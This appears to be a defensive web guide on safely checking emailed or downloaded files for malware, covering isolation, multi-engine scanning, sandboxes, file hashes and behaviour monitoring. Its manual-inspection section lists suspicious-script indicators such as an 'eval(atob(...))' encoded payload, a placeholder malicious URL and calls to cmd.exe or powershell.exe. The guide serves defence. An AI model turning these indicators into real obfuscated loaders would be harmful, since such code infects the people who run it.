How to Check a File for Malware Safely | Guide for Opening Files from Mails or Downloads

Introduction

Receiving files from new partners, suppliers, or unknown senders is a common part of modern business. However, malware hidden in seemingly harmless files (e.g., PDFs, Word documents, or executables) can compromise your data, systems, and even your entire network. In 2025, cyberattacks via malicious file attachments increased by 35% (Source: SonicWall Cyber Threat Report 2025).

This guide will walk you through how to safely check a file for malware, using free and paid tools, best practices, and expert recommendations. Whether you're a business owner, IT professional, or everyday user, these steps will help you avoid falling victim to cyber threats.

Why You Should Never Trust Files from Unknown Sources

Malware can be disguised in any file type, including:

• PDFs and Office documents (e.g., .docx, .xlsx)

• Executables (e.g., .exe, .msi)

• Archives (e.g., .zip, .rar)

• Scripts (e.g., .js, .py, .vbs)

Common malware types delivered via files include:

• Ransomware: Encrypts your files and demands payment (e.g., LockBit, BlackCat).

• Spyware: Steals sensitive data (e.g., keyloggers, trojans).

• Adware: Displays unwanted ads and slows down your system.

• Worms: Self-replicating malware that spreads across networks.

💡 Did You Know?
According to Cisco’s 2025 Annual Cybersecurity Report, 90% of malware is delivered via email attachments or downloads.

Step-by-Step Guide: How to Check a File for Malware

Step 1: Isolate the File

Before doing anything else, do not open the file on your main computer. Instead:

• Move it to a quarantined folder (e.g., a dedicated "Suspicious Files" directory).

• Use a separate, non-critical device or a virtual machine (VM) for analysis.

• Disconnect from the internet to prevent malware from phoning home.

⚠️ Warning:
Opening a malicious file—even in "Preview" mode—can trigger an infection.

Step 2: Scan with Antivirus/Anti-Malware Tools

Option A: VirusTotal (Free & Online)

VirusTotal is a free service that scans files with 70+ antivirus engines (e.g., Kaspersky, Bitdefender, ESET).

How to use VirusTotal:

1. Go to VirusTotal.

2. Upload the file (max size: 650 MB).

3. Wait for the scan to complete (usually 1-2 minutes).

4. Review the detection ratio (e.g., "20/70 engines detected malware").

   • **0 detections**: Likely safe (but proceed with caution).

   • **1+ detections**: **Do not open the file**.

🔍 Pro Tip:
VirusTotal also provides file behavior analysis (e.g., network connections, registry changes). Check the "Details" tab for more insights.

Option B: Local Antivirus Scan

Use trusted antivirus software to scan the file offline:

• Windows Defender (Built into Windows 10/11)

• Malwarebytes (Download here)

• Kaspersky (Download here)

• Bitdefender (Download here)

How to scan:

1. Right-click the file.

2. Select "Scan with [Your Antivirus]".

3. If the scan flags the file as malicious, delete it immediately.

Step 3: Use Sandbox Analysis

Sandboxing allows you to safely execute a file in a controlled environment and observe its behavior. Here are the best tools:

Tool

Description

Link

Free/Paid

Any.run

Interactive sandbox for analyzing malware in real-time.

any.run

Free (public submissions)

Hybrid Analysis

Automated malware analysis with detailed reports.

hybrid-analysis.com

Free

Cuckoo Sandbox

Open-source sandbox for advanced users.

cuckoosandbox.org

Free

Joe Sandbox

Commercial sandbox with deep analysis.

joesandbox.com

Paid

How to use a sandbox:

1. Upload the file to the sandbox tool.

2. Wait for the analysis to complete (usually 5-10 minutes).

3. Review the report for suspicious activities, such as:

   • Unexpected network connections.

   • File modifications or deletions.

   • Registry changes.

   • Process injections.

💡 Example:
If a Word document tries to download and execute a PowerShell script, it’s almost certainly malicious.

Step 4: Check File Metadata and Hashes

A. Verify File Extensions

Malware often disguises itself with fake file extensions. For example:

• invoice.pdf.exe (appears as invoice.pdf if extensions are hidden).

• contract.docx.js (appears as contract.docx).

How to check:

• Windows: Enable file extensions in File Explorer > View > Show > File name extensions.

• Mac/Linux: Use the file command in Terminal:

  file suspicious_file.docx

B. Calculate and Check File Hashes

A file hash (e.g., SHA-256) is a unique fingerprint of a file. You can use it to check if the file matches known malware.

How to calculate a hash:

• Windows (PowerShell):

  Get-FileHash -Algorithm SHA256 suspicious_file.exe

• Mac/Linux (Terminal):

  sha256sum suspicious_file.exe

Where to check the hash:

• VirusTotal (Paste the hash in the search bar).

• NSRL (National Software Reference Library) (For known good files).

⚠️ Warning:
If the hash matches a known malware sample, do not open the file.

Step 5: Manual Inspection (For Advanced Users)

If you’re comfortable with technical details, you can manually inspect certain file types:

A. Text/Script Files (e.g., .js, .py, .vbs)

1. Open the file in a text editor (e.g., Notepad++, VS Code).

2. Look for:

   • **Obfuscated code** (e.g., long strings of random characters).

   • **Base64-encoded payloads** (e.g., `eval(atob("..."))`).

   • **Suspicious URLs or IP addresses** (e.g., `http://malicious-site.xyz`).

   • **Calls to dangerous executables** (e.g., `cmd.exe`, `powershell.exe`, `wscript.exe`).

B. PDF/Office Files

• Use pdfid (for PDFs) or OleTools (for Office files) to check for:

  • Embedded macros (common in Word/Excel malware).

  • Exploits (e.g., CVE-2023-21608 in Adobe Acrobat).

🔧 Tools:

• pdfid (PDF analysis)

• OleTools (Office file analysis)

Step 6: Behavioral Analysis (Monitor File Activity)

If you must open the file, use these tools to monitor its behavior:

Tool

Purpose

Link

Process Monitor

Monitors file, registry, and process activity in real-time.

Microsoft Sysinternals

Wireshark

Captures and analyzes network traffic.

wireshark.org

TCPView

Shows all active TCP and UDP connections.

Microsoft Sysinternals

What to look for:

• Unexpected outbound network connections (e.g., to unknown IPs).

• File deletions or modifications (e.g., in C:\Windows\System32).

• New processes spawned by the file.

Step 7: Consult a Professional

If the file is highly sensitive or you’re unsure about the results:

• Hire a cybersecurity firm for a forensic analysis.

• Contact your IT security team (if applicable).

• Report the file to platforms like:

  • CISA (Cybersecurity and Infrastructure Security Agency)

  • Europol Report a Crime

General Precautions to Avoid Malware

1. Never disable security features (e.g., macros in Office files) to open a file.

2. Avoid opening files from unknown senders unless absolutely necessary.

3. Use a dedicated, air-gapped machine for testing suspicious files.

4. Keep your software updated (e.g., OS, antivirus, browsers).

5. Educate your team on recognizing phishing emails and malicious attachments.

6. Backup your data regularly to recover from ransomware attacks.

What to Do If You Find Malware

1. Do not open the file under any circumstances.

2. Delete the file from all devices.

3. Inform the sender (they may be unaware their system is compromised).

4. Scan your entire system with antivirus software.

5. Monitor for unusual activity (e.g., unauthorized logins, data exfiltration).

6. Report the incident to your IT team or a cybersecurity professional.

Best Free and Paid Tools for Malware Analysis

Tool

Type

Free/Paid

Link

VirusTotal

Multi-engine antivirus scan

Free

virustotal.com

Any.run

Interactive sandbox

Free (public)

any.run

Hybrid Analysis

Automated malware analysis

Free

hybrid-analysis.com

Cuckoo Sandbox

Open-source sandbox

Free

cuckoosandbox.org

Malwarebytes

Local antivirus scan

Free/Paid

malwarebytes.com

Process Monitor

Behavioral analysis

Free

Microsoft Sysinternals

Wireshark

Network traffic analysis

Free

wireshark.org

Joe Sandbox

Commercial sandbox

Paid

joesandbox.com

FAQs About Checking Files for Malware

1. Can a PDF or Word document contain malware?

Yes. Malicious PDFs and Office files can contain exploits (e.g., CVE-2023-21608) or embedded macros that execute malware when opened.

2. Is VirusTotal 100% accurate?

No. While VirusTotal uses 70+ antivirus engines, some zero-day malware (new, unknown threats) may not be detected. Always use multiple tools for verification.

3. What should I do if my antivirus doesn’t detect anything, but I’m still suspicious?

Use a sandbox tool (e.g., Any.run) to observe the file’s behavior. If it exhibits suspicious activity (e.g., network connections), treat it as malicious.

4. Can I trust files from known senders?

Not always. Compromised email accounts or supply chain attacks (e.g., SolarWinds) can make even trusted senders unknowingly spread malware. Always verify.

5. How often should I scan my system for malware?

• Weekly for personal use.

• Daily for business/critical systems.

• After every suspicious file download.

Conclusion

Checking a file for malware is a critical step in protecting your data, devices, and business from cyber threats. By following this step-by-step guide, you can safely verify files before opening them, using a combination of antivirus scans, sandbox analysis, and manual inspection.

Remember:

• ✅ Isolate the file before analysis.

• ✅ Use multiple tools (e.g., VirusTotal + sandbox).

• ✅ Never open suspicious files on your main system.

• ✅ Stay updated on the latest cybersecurity threats.

By taking these precautions, you can minimize the risk of malware infections and keep your digital environment secure.